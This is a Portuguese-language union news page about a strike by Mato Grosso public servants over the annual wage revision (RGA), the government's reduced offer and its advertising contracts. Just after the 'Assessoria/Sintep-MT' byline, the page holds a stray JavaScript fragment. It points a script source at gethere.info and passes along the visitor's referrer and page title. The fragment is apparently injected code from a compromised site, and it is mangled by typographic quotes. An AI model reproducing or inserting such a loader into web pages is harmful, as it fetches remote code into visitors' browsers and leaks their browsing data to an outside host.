Capa / Em Destaque / Servidores em greve se concentram em acampamento unificado no CPA

Servidores em greve se concentram em acampamento unificado no CPA

RGA jáA Greve Geral Unificada continua em Mato Grosso com concentração dos sindicalista em frente a Secretaria de Estado de Gestão (Seges), Centro Político Administrativo (CPA), em Cuiabá. Nessa sexta-feira (03.06) o acampamento teve atividades no período da tarde. No interior, cada subsede desenvolveu agenda de mobilizações, independente da Central.

As atividades paredistas foram intensificas após a nova proposta do Governo em pagar apenas 6%, dos 11,28%, da Revisão Geral Anual (RGA), e ainda jogar duas parcelas desse pagamento para 2017. “A segunda proposta do governo foi mais indecorosa ainda e foi comunicada com recheios de ameaças”, destacou o presidente do Sintep-MT, Henrique Lopes do Nascimento.

O presidente reforça que a luta continua, principalmente frente algumas atitudes do governo que tem surpreendido os membros do Fórum. Uma delas foi o fato do Governo argumentar falta de recursos para o RGA, mas gastar 70 milhões com novo contrato com 5 agências de publicidade. Contratos esses que poderão vir a ter aditivos e prorrogações, podendo o Governo desembolsar dos cofres públicos até R$ 400 milhões.

Outro ponto nas contradições do Governo está na tentativa de fazer a sociedade acreditar que tem um posicionamento democrático frente as reivindicações dos servidores.  Ele divulgou nos veículos de comunicação que iria à Brasília tentar novos recursos para renegociar o pagamento do RGA. No entanto, antes de apresentar a nova proposta, ontem (02.06), já havia pedido liminar (31.05) para decretar a greve ilegal.

As atitudes só fortalecem o movimento grevista na Educação, que mesmo diante das ameaças, continuará na luta para defender a pauta: RGA integral retroativo a maio para cumprir a 510/13; calendário para Concurso Público; e, retirada do projeto das Parcerias Público-Privadas (PPP’s), chamando uma conferência com a participação da comunidade.

Assessoria/Sintep-MT

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top